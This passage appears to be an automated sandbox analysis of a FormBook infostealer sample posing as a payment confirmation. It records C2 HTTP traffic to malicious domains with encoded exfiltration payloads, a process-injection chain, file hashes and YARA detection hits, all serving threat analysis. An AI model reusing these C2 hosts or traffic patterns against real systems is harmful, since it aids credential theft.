                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Md21SjjXZTTrzwKPSfI2netjJE7iPK2stIFIbp%2BjdGa3PU%2FuJjS9woUOCkN9Yp%2B33VpFiBHSPVecsQuj5nvKhFW1IIribN4xvm94VL0tyTv%2BRzWSbhiQ6GLwl8sPV6Sjfpw"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162fa0f992424d-EWR
                                        Content-Encoding: gzip
                                        alt-svc: h3=":443"; ma=86400


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        33 | 192.168.2.22 | 49194 | 104.21.20.125 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:18.149590969 CEST | 456 | OUT | GET /h5qr/?th=XXRlJ2&OlTXe=/bmdZ0vLXnogocV0idkPv6fvlXir++PhB87loKV3gq9LyeQpMfhy5LnTQyXzEM68COgVHo1sr0sPxg1PcZaDoopDxaOUW7iZ7CHsWJT1TI0rPygwHovQ2DwKWcHt HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.kckartal.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:18.744267941 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:11:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                        pragma: no-cache
                                        vary: User-Agent
                                        x-turbo-charged-by: LiteSpeed
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JifVl%2Feh2TXRNbetTliwOifvDzVqBTClE6Fbe7njkl03juwr3DZNmLBTbbn5lHNISqqaxcr2R7uPNnzuYehs9F1InRGImEdiDv8GUi5D8QZLfWtoqR0dqYp3CmxByRcbX%2BWq"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c162fb0e8577291-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top
                                        Sep 11, 2024 10:11:18.744292021 CEST | 723 | IN | Data Ascii: : 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></di
                                        Sep 11, 2024 10:11:18.744714022 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        34 | 192.168.2.22 | 49195 | 43.242.202.169 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:24.094726086 CEST | 2472 | OUT | POST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:24.099747896 CEST | 212 | OUT | Data Raw: 65 46 4c 4f 31 6c 33 49 5a 67 55 2b 33 68 56 44 79 6c 46 6e 74 4d 45 78 70 63 62 74 47 6d 76 6f 2b 44 48 6c 49 62 37 42 56 65 6f 4c 75 4e 51 6b 63 2b 59 36 74 4b 6f 41 4d 4a 67 55 37 4f 65 6b 49 63 54 71 70 44 31 4c 48 43 65 77 7a 62 51 31 4f 47
                                        Data Ascii: eFLO1l3IZgU+3hVDylFntMExpcbtGmvo+DHlIb7BVeoLuNQkc+Y6tKoAMJgU7OekIcTqpD1LHCewzbQ1OG3DBcqAisFZZPrv0Ckhzdfzb8edxe4dfreWXpCruXGEzYsL34i26c7VnMeLVi7kFuPSgSGUOP7pPg95kZik0G4l/2+cWEbnSSXiqTBfT9OozwaJ7t4R+oRiKJwTCHw+nOdA
                                        Sep 11, 2024 10:11:25.267967939 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                        Sep 11, 2024 10:11:25.268136024 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        35 | 192.168.2.22 | 49196 | 43.242.202.169 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:26.631670952 CEST | 723 | OUT | POST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 4b 38 5a 50 68 79 6a 4f 59 38 70 66 76 53 79 4c 44 55 44 63 4d 6e 2f 51 5a 64 54 36 5a 74 2f 51 47 52 2b 66 46 43 62 52 41 37 57 75 46 61 4f 77 52 2b 35 62 66 54 4a 72 44 37 50 68 32 54 62 34 6e 43 4d 79 7a 58 7a 59 75 71 4e 6b 37 77 42 30 43 7a 52 75 55 65 38 58 30 4d 59 54 66 67 2f 69 66 6c 4c 6e 64 57 6c 37 42 46 5a 42 32 52 45 53 48 79 2f 63 79 48 7a 57 36 43 62 37 6a 6c 79 53 47 74 65 58 35 4d 75 41 74 54 54 30 78 58 6e 6f 33 44 36 68 69 73 54 38 59 6f 69 68 50 6a 74 2b 66 5a 2f 75 72 41 73 6f 59 42 75 6c 64 7a 76 72 4b 6d 33 6a 77 3d 3d
                                        Data Ascii: OlTXe=Klwv1EENmccPyK8ZPhyjOY8pfvSyLDUDcMn/QZdT6Zt/QGR+fFCbRA7WuFaOwR+5bfTJrD7Ph2Tb4nCMyzXzYuqNk7wB0CzRuUe8X0MYTfg/iflLndWl7BFZB2RESHy/cyHzW6Cb7jlySGteX5MuAtTT0xXno3D6hisT8YoihPjt+fZ/urAsoYBuldzvrKm3jw==
                                        Sep 11, 2024 10:11:27.485145092 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:27 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        36 | 192.168.2.22 | 49197 | 43.242.202.169 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:29.170734882 CEST | 2472 | OUT | POST /ed2j/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Origin: http://www.mizuquan.top
                                        Referer: http://www.mizuquan.top/ed2j/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 4b 6c 77 76 31 45 45 4e 6d 63 63 50 79 71 4d 5a 66 32 4f 6a 4a 34 38 32 42 2f 53 79 42 6a 55 35 63 4d 72 2f 51 62 77 49 35 76 56 2f 54 55 70 2b 65 6a 2b 62 54 41 37 57 6f 46 62 48 74 42 2f 36 62 62 37 7a 72 43 4c 35 68 30 2f 62 71 32 53 4d 6a 52 76 77 41 4f 71 4c 75 62 77 47 30 43 7a 2b 75 55 75 34 58 30 49 79 54 62 4d 2f 69 74 64 4c 77 64 58 7a 6c 78 46 5a 42 32 52 59 53 48 7a 63 63 79 76 52 57 2b 75 4c 36 51 74 79 52 6d 4e 65 55 65 34 74 49 4e 54 58 31 78 58 70 70 43 6d 32 35 53 59 2b 77 34 6f 54 67 4e 37 2b 79 39 4a 46 6a 37 41 62 6f 71 74 39 73 70 69 6e 70 62 54 45 38 75 4a 39 35 64 36 37 35 42 71 71 6d 6f 44 71 31 2b 5a 59 34 59 36 56 7a 79 6f 49 50 73 6f 4f 43 75 61 63 46 77 4d 4f 31 78 64 6e 47 47 4c 2f 32 6e 50 6c 4c 49 63 6d 74 71 76 44 34 74 66 51 46 55 57 42 65 56 32 2b 55 42 5a 46 4a 6f 70 2b 73 7a 39 54 44 56 4d 2f 79 31 77 44 32 56 30 6c 39 57 6c 35 43 38 63 6e 6f 49 46 2f 49 4b 4f 58 69 79 56 30 38 35 38 71 54 43 41 67 5a 6d 4f 2f 46 42 36 36 30 4b 38 72 4a 32 64 34 [TRUNCATED]
                                        Data Ascii: OlTXe=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 [TRUNCATED]
                                        Sep 11, 2024 10:11:29.175673008 CEST | 1676 | OUT | Data Raw: 4b 31 4c 4a 38 46 33 69 5a 67 55 71 33 6c 4e 74 79 6e 4a 6e 74 5a 41 78 76 70 6e 74 47 57 76 75 6e 54 48 32 43 37 32 4d 56 65 55 58 75 49 39 5a 63 50 34 36 73 38 30 41 48 61 49 55 2b 75 65 6c 55 4d 54 33 70 44 70 77 48 44 79 4b 7a 66 30 50 4e 79
                                        Data Ascii: K1LJ8F3iZgUq3lNtynJntZAxvpntGWvunTH2C72MVeUXuI9ZcP46s80AHaIU+uelUMT3pDpwHDyKzf0PNynDCMqAgedadPrpzCkwzdeUb8WZxfVFfqGWXsurvnGLwotCy4io6cnwnMWlVirkFuTSyiWUJP7pDA94p5iHwG0m/yGCBgXmfmGGsn4tXcOz7jGb9vto55ZkGaI6WikooYlAH/KoljBGgdFl89461YYy6W5usl28HlV
                                        Sep 11, 2024 10:11:30.034816027 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        37 | 192.168.2.22 | 49198 | 43.242.202.169 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:11:31.716268063 CEST | 456 | OUT | GET /ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.mizuquan.top
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:11:32.596515894 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Wed, 11 Sep 2024 08:11:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Target ID:0
                                        Start time:04:08:29
                                        Start date:11/09/2024
                                        Path:C:\Users\user\Desktop\Payment confirmation 20240911.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Payment confirmation 20240911.exe"
                                        Imagebase:0x12e0000
                                        File size:1'211'392 bytes
                                        MD5 hash:FCE0847BE56787ED350B9AA76990D91D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:04:08:30
                                        Start date:11/09/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Payment confirmation 20240911.exe"
                                        Imagebase:0x1f0000
                                        File size:20'992 bytes
                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:04:08:40
                                        Start date:11/09/2024
                                        Path:C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe"
                                        Imagebase:0xf70000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:4
                                        Start time:04:08:41
                                        Start date:11/09/2024
                                        Path:C:\Windows\SysWOW64\RMActivate_ssp.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\RMActivate_ssp.exe"
                                        Imagebase:0x30000
                                        File size:510'976 bytes
                                        MD5 hash:08D323750350A8A29611D1004C0CF319
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        Target ID:7
                                        Start time:04:09:13
                                        Start date:11/09/2024
                                        Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0xd00000
                                        File size:517'064 bytes
                                        MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
